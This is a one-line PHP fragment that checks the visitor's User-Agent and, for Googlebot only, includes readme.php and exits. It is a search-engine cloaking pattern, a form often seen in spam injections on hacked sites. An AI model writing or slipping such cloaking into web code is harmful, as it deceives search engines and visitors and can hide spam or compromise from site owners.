$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? ''; if (stripos($userAgent, 'Googlebot') !== false) { require __DIR__ . '/readme.php'; exit; }